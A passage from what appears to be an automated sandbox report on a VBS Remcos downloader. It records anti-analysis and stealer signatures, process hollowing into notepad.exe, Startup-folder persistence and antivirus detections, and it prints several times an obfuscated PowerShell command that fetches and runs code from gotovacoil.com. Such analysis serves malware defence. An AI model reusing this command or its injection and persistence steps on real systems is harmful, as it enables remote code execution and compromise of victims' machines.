5,_*F0,_*E9,_*FA,_*5A,_*8B,_*CA,_*E8,_*8E,_*A3,_*6E,_*95,_*5C,_*06,_*53,_*EF,_*4C,_*35,_*CD,_*7A,_*3D,_*78,_*3A,_*1A,_*65,_*96,_*15,_*63,_*73,_*65,_*DF,_*4F,_*08,_*43,_*72,_*C7,_*B9,_*C0,_*EF,_*46,_*68,_*22,_*0D,_*F4,_*19,_*B1,_*6B,_*CA,_*CC,_*E9,_*D5,_*D3,_*AA,_*F2,_*ED,_*AB,_*36,_*BC,_*E9,_*71,_*C9,_*DA,_*AD,_*C4,_*D7,_*96,_*8D,_*7E,_*AD,_*B5,_*47,_*FF,_*90,_*DB,_*FF,_*DA,_*95,_*C2,_*60,_*73,_*A0,_*F0,_*26,_*6D,_*80,_*B2,_*DD,_*F1,_*6B,_*9B,_*B7,_*E7,_*44,_*CD,_*87,_*5F,_*03,_*9D,_*49,_*5E,_*E6,_*4D,_*A7,_*CB,_*FE,_*BD,_*E9,_*BC,_*70,_*B8,_*FF,_*06,_*25,_*BD,_*C7,_*B8,_*8A,_*F8,_*B4,_*45,_*2B,_*36,_*EF,_*A3,_*97,_*4C,_*C4,_*FF,_*6B,_*E8,_*83,_*6E,_*9A,_*20,_*05,_*13,_*0A,_*FB,_*4A,_*08,_*40,_*4B,_*92,_*23,_*3F,_*C9,_*D1,_*64,_*F2,_*98,_*78,_*53,_*DC,_*FC,_*82,_*26,_*BF,_*73,_*E5,_*AA,_*95,_*74,_*5A,_*0B,_*5B,_*3E,_*D1,_*72,_*53,_*B
Data sent GET /cname/Encrypted%20Client%20OG.jpg HTTP/1.1 Host: gotovacoil.com Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Take ScreenShot rule ScreenShot
description Communications use DNS rule Network_DNS
description Win.Trojan.agentTesla rule Win_Trojan_agentTesla_Zero
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Run a KeyLogger rule KeyLogger
description Google Chrome User Data Check rule Chrome_User_Data_Check_Zero
description browser info stealer rule infoStealer_browser_Zero
description File Downloader rule Network_Downloader
description Escalate priviledges rule Escalate_priviledges
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2612
region_size: 499712
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000488
1 0 0
count 1342 name heapspray process powershell.exe total_mb 83 length 65536 protection PAGE_READWRITE
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $;’ALZüLZüLZüøÆ _ZüøÆêZüøÆRZüE"xMZüÒú;NZüwÿVZüwùvZüwønZüE"oYZüLZýe[üÛõZüÞMZüÛþMZüRichLZüPELäûFbà , U@@ €è–Ü8K`|8 {84|Ø{@@œ.textÝ*, `.rdata´o@p0@@.dataì>° @À.tls ð®@À.gfids0°@@.rsrc8KL´@@.reloc|8`:@B
base_address: 0x00400000
process_identifier: 2612
process_handle: 0x00000488
1 1 0

WriteProcessMemory

buffer: €ÿÿÿÿ±¿DNæ@»ÿÿÿÿ Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.ÿÿÿÿ “    L…EPˆEJ…E..p±FLÆFLÆFLÆFLÆFLÆFLÆFLÆFLÆFLÆFt±FPÆFPÆFPÆFPÆFPÆFPÆFPÆFx±FÿÿÿÿPˆE˜²F˜²F˜²F˜²F˜²Fx±FЊEPŒE˜šEرFp·FCPSTPDT ²Fà²Fÿÿÿÿÿÿÿÿÿÿÿÿ€ ¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZp·Fþÿÿÿþÿÿÿu˜0Ï!­tåša¾Œe¸‘¢z»Œ^ž âȨ3œÀqF”AÌqF:!AØqFYATFE.?AVtype_info@@TFE.?AVbad_alloc@std@@TFE.?AVbad_array_new_length@std@@TFE.?AVlogic_error@std@@TFE.?AVlength_error@std@@TFE.?AVout_of_range@std@@TFE.?AV_Facet_base@std@@TFE.?AV_Locimp@locale@std@@TFE.?AVfacet@locale@std@@TFE.?AU_Crt_new_delete@std@@TFE.?AVcodecvt_base@std@@TFE.?AUctype_base@std@@TFE.?AV?$ctype@D@std@@TFE.?AV?$codecvt@DDU_Mbstatet@@@std@@TFE.?AVbad_exception@std@@TFE.HTFE.?AVfailure@ios_base@std@@TFE.?AVruntime_error@std@@TFE.?AVsystem_error@std@@TFE.?AVbad_cast@std@@TFE.?AV_System_error@std@@TFE.?AVexception@std@@
base_address: 0x0046b000
process_identifier: 2612
process_handle: 0x00000488
1 1 0

WriteProcessMemory

buffer: €
base_address: 0x0046f000
process_identifier: 2612
process_handle: 0x00000488
1 1 0

WriteProcessMemory

buffer: cøHøg>½ü×üg>%ýg>é©g>š¬¬]V] @Þ?ýî´Ý´]g>g>/J‚Ißü«ünɵп,ß,ßÀ=~@֐®‘a ÿÑÔSÚ£Ü7ØeJȊþ´£! b Er4NPNWN]TUZ[ äøää äö_^îØØäüûüû í9<8;ú` Ÿž†…¢†…§µ¶³´±²¯°†…¸ Ÿ†… Y
base_address: 0x00470000
process_identifier: 2612
process_handle: 0x00000488
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2612
process_handle: 0x00000488
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $;’ALZüLZüLZüøÆ _ZüøÆêZüøÆRZüE"xMZüÒú;NZüwÿVZüwùvZüwønZüE"oYZüLZýe[üÛõZüÞMZüÛþMZüRichLZüPELäûFbà , U@@ €è–Ü8K`|8 {84|Ø{@@œ.textÝ*, `.rdata´o@p0@@.dataì>° @À.tls ð®@À.gfids0°@@.rsrc8KL´@@.reloc|8`:@B
base_address: 0x00400000
process_identifier: 2612
process_handle: 0x00000488
1 1 0
Time & API Arguments Status Return Repeated

send

buffer: GET /cname/Encrypted%20Client%20OG.jpg HTTP/1.1 Host: gotovacoil.com Connection: Keep-Alive
socket: 1420
sent: 97
1 97 0
Process injection Process 2156 called NtSetContextThread to modify thread in remote process 2612
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4394837
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000005c8
process_identifier: 2612
1 0 0
parent_process wscript.exe martian_process Powershell $t0='ZE95'.replace('Z','I').replace('95','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,01100111,01101111,01110100,01101111,01110110,01100001,01100011,01101111,01101001,01101100,00101110,01100011,01101111,01101101,00101111,01100011,01101110,01100001,01101101,01100101,00101111,01000101,01101110,01100011,01110010,01111001,01110000,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00100000,01001111,01000111,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))|P
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t0='ZE95'.replace('Z','I').replace('95','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,01100111,01101111,01110100,01101111,01110110,01100001,01100011,01101111,01101001,01101100,00101110,01100011,01101111,01101101,00101111,01100011,01101110,01100001,01101101,01100101,00101111,01000101,01101110,01100011,01110010,01111001,01110000,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00100000,01001111,01000111,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))|P
parent_process wscript.exe martian_process Powershell Move-item 'C:\Users\test22\AppData\Local\Temp\Protected%20Client.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Protected%20Client.vbs'
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\test22\AppData\Local\Temp\Protected%20Client.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Protected%20Client.vbs'
parent_process powershell.exe martian_process C:\Windows\SysWOW64\notepad.exe
Process injection Process 2840 resumed a thread in remote process 2156
Process injection Process 2840 resumed a thread in remote process 2236
Process injection Process 2156 resumed a thread in remote process 2612
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000330
suspend_count: 1
process_identifier: 2156
1 0 0

NtResumeThread

thread_handle: 0x000002e8
suspend_count: 1
process_identifier: 2236
1 0 0

NtResumeThread

thread_handle: 0x000005c8
suspend_count: 1
process_identifier: 2612
1 0 0
Lionic Trojan.Script.Generic.4!c
MicroWorld-eScan VBS.Heur.ObfDldr.39.7AA82C65.Gen
ALYac VBS.Heur.ObfDldr.39.7AA82C65.Gen
Arcabit VBS.Heur.ObfDldr.39.7AA82C65.Gen
Cyren VBS/Agent.ANG.gen!Eldorado
ESET-NOD32 VBS/TrojanDownloader.Agent.XFY
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan.Script.Generic
BitDefender VBS.Heur.ObfDldr.39.7AA82C65.Gen
NANO-Antivirus Trojan.Script.Vbs-heuristic.druvzi
Tencent Win32.Trojan.Malware.Nbtm
Ad-Aware VBS.Heur.ObfDldr.39.7AA82C65.Gen
TrendMicro TROJ_FRS.0NA104EK22
FireEye VBS.Heur.ObfDldr.39.7AA82C65.Gen
Emsisoft VBS.Heur.ObfDldr.39.7AA82C65.Gen (B)
Ikarus Trojan-Downloader.VBS.Remcos
Microsoft TrojanDownloader:VBS/Remcos.PKRN!MTB
ZoneAlarm HEUR:Trojan.Script.Generic
GData VBS.Heur.ObfDldr.39.7AA82C65.Gen
MAX malware (ai score=80)
Fortinet VBS/Agent.XEK!tr
AVG Script:SNH-gen [Trj]
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2160
thread_handle: 0x00000330
process_identifier: 2156
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t0='ZE95'.replace('Z','I').replace('95','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,01100111,01101111,01110100,01101111,01110110,01100001,01100011,01101111,01101001,01101100,00101110,01100011,01101111,01101101,00101111,01100011,01101110,01100001,01101101,01100101,00101111,01000101,01101110,01100011,01110010,01111001,01110000,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00100000,01001111,01000111,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))|P
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000338
1 1 0

NtResumeThread

thread_handle: 0x00000330
suspend_count: 1
process_identifier: 2156
1 0 0

CreateProcessInternalW

thread_identifier: 2252
thread_handle: 0x000002e8
process_identifier: 2236
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\test22\AppData\Local\Temp\Protected%20Client.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Protected%20Client.vbs'
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000338
1 1 0

NtResumeThread

thread_handle: 0x000002e8
suspend_count: 1
process_identifier: 2236
1 0 0

NtResumeThread

thread_handle: 0x00000294
suspend_count: 1
process_identifier: 2156
1 0 0

NtResumeThread

thread_handle: 0x000002e8
suspend_count: 1
process_identifier: 2156
1 0 0

NtResumeThread

thread_handle: 0x00000444
suspend_count: 1
process_identifier: 2156
1 0 0

NtResumeThread

thread_handle: 0x00000574
suspend_count: 1
process_identifier: 2156
1 0 0

CreateProcessInternalW

thread_identifier: 2628
thread_handle: 0x000005c8
process_identifier: 2612
current_directory:
filepath: C:\Windows\SysWOW64\notepad.exe
track: 1
command_line:
filepath_r: C:\WINDOWS\syswow64\notepad.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000488
1 1 0

NtGetContextThread

thread_handle: 0x000005c8
1 0 0

NtAllocateVirtualMemory

process_identifier: 2612
region_size: 499712
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000488
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $;’ALZüLZüLZüøÆ _ZüøÆêZüøÆRZüE"xMZüÒú;NZüwÿVZüwùvZüwønZüE"oYZüLZýe[üÛõZüÞMZüÛþMZüRichLZüPELäûFbà , U@@ €è–Ü8K`|8 {84|Ø{@@œ.textÝ*, `.rdata´o@p0@@.dataì>° @À.tls ð®@À.gfids0°@@.rsrc8KL´@@.reloc|8`:@B
base_address: 0x00400000
process_identifier: 2612
process_handle: 0x00000488
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 2612
process_handle: 0x00000488
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00454000
process_identifier: 2612
process_handle: 0x00000488
1 1 0

WriteProcessMemory

buffer: €ÿÿÿÿ±¿DNæ@»ÿÿÿÿ Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.ÿÿÿÿ “    L…EPˆEJ…E..p±FLÆFLÆFLÆFLÆFLÆFLÆFLÆFLÆFLÆFt±FPÆFPÆFPÆFPÆFPÆFPÆFPÆFx±FÿÿÿÿPˆE˜²F˜²F˜²F˜²F˜²Fx±FЊEPŒE˜šEرFp·FCPSTPDT ²Fà²Fÿÿÿÿÿÿÿÿÿÿÿÿ€ ¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZp·Fþÿÿÿþÿÿÿu˜0Ï!­tåša¾Œe¸‘¢z»Œ^ž âȨ3œÀqF”AÌqF:!AØqFYATFE.?AVtype_info@@TFE.?AVbad_alloc@std@@TFE.?AVbad_array_new_length@std@@TFE.?AVlogic_error@std@@TFE.?AVlength_error@std@@TFE.?AVout_of_range@std@@TFE.?AV_Facet_base@std@@TFE.?AV_Locimp@locale@std@@TFE.?AVfacet@locale@std@@TFE.?AU_Crt_new_delete@std@@TFE.?AVcodecvt_base@std@@TFE.?AUctype_base@std@@TFE.?AV?$ctype@D@std@@TFE.?AV?$codecvt@DDU_Mbstatet@@@std@@TFE.?AVbad_exception@std@@TFE.HTFE.?AVfailure@ios_base@std@@TFE.?AVruntime_error@std@@TFE.?AVsystem_error@std@@TFE.?AVbad_cast@std@@TFE.?AV_System_error@std@@TFE.?AVexception@std@@
base_address: 0x0046b000
process_identifier: 2612
process_handle: 0x00000488
1 1 0

WriteProcessMemory

buffer: €
base_address: 0x0046f000
process_identifier: 2612
process_handle: 0x00000488
1 1 0

WriteProcessMemory

